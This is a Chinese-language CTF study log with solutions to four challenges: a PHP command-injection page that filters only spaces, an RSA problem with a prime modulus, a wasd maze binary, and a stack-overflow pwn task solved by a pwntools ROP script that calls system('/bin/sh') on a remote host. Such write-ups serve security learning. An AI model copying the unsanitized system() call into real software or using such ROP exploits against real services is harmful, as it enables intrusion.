2.9学习记录

web

RCEisamazingwithspace

读题目就知道可能跟空格绕过有关
题目：

<?php
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
// check if space is present in the command
// use of preg_match to check if space is present in the command
if (preg_match('/\s/', $cmd)) {echo 'Space not allowed in command';exit;
}// execute the command
system($cmd);

本以为有很多黑名单，没想到只用绕空格进行post传参即可在这里插入图片描述

crypto

babyrsa

题目：

from Crypto.Util.number import *flag=b'BaseCTF{}'
m=bytes_to_long(flag)n=getPrime(1024)
e=65537
c=pow(m,e,n)print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""

n，e，c都给了，直接套用脚本
exp：

from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))

re

ez_maze

读题目就可以知道这是一道迷宫题
拿到附件先查壳在这里插入图片描述没壳的64位文件，用ida查看找主调函数

int __fastcall main(int argc, const char **argv, const char **envp)
{int v3; // eaxchar v5[32]; // [rsp+20h] [rbp-60h] BYREF__int16 v6; // [rsp+40h] [rbp-40h]char v7; // [rsp+42h] [rbp-3Eh]int i; // [rsp+48h] [rbp-38h]int v9; // [rsp+4Ch] [rbp-34h]sub_401840(argc, argv, envp);j_puts(Buffer);j_puts(aTakeTheShortes);j_puts(aShowYourTime);memset(v5, 0, sizeof(v5));v6 = 0;v7 = 0;j_scanf("%34s", v5);v9 = 0;for ( i = 0; v5[i]; ++i ){v3 = (unsigned __int8)v5[i];if ( v3 == 100 ){if ( v9 % 15 == 14 )goto LABEL_20;++v9;}else if ( (unsigned __int8)v5[i] > 0x64u ){if ( v3 == 115 ){if ( v9 > 209 )goto LABEL_20;v9 += 15;}else{if ( v3 != 119 ){
LABEL_21:j_puts(aInvalidInput);return -1;}if ( v9 <= 14 )goto LABEL_20;v9 -= 15;}}else{if ( v3 != 97 )goto LABEL_21;if ( !(v9 % 15) ){
LABEL_20:j_puts(aInvalidMoveOut);return -1;}--v9;}if ( asc_403020[v9] == 36 ){j_puts(aInvalidMoveHit);return -1;}if ( asc_403020[v9] == 121 ){j_puts(aYouWin);j_puts(aPlzBasectfLowe);return 0;}}j_puts(aYouDidnTReachT);return 0;

首先可以看出，这里调用了指针模块，结合题目maze可以推断出这是一个迷宫问题，接着看v3的赋值，很明显这里是根据v3传入的参数执行命令，但题目中的v3都是给了数字，就很容易联想到ASCII码表，去查了一下果然是wasd 在这里插入图片描述同时也从上面的代码看出迷宫起点是x终点是y，接下来在分析迷宫的大小，可以看出按下s键的时候向右移动了15格，说明迷宫的行宽是15，接下来只需要确定迷宫和规则就可以了在主调函数里找到了路径就是flag，手搓一下在这里插入图片描述走出来是sssssssddddwwwddsssssssdddsssddddd，用md5加密一下即可

pwn

我把她丢了

拿到附件先看一下在这里插入图片描述没有保护的64位elf文件，放到ida看一下，找到主调函数，发现在read处存在栈溢出
发现后门函数和地址
因为是64位文件，需要寄存器，寄存器地址：

exp：

from pwn import *
io=process('./pwn')
io=remote("gz.imxbt.cn",20389)
elf=ELF('./pwn')
pop_rdi=0x401196
binsh=0x402008
ret=0x40101a
shell=elf.plt['system']
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)
io.recv()
io.sendline(payload)
io.interactive()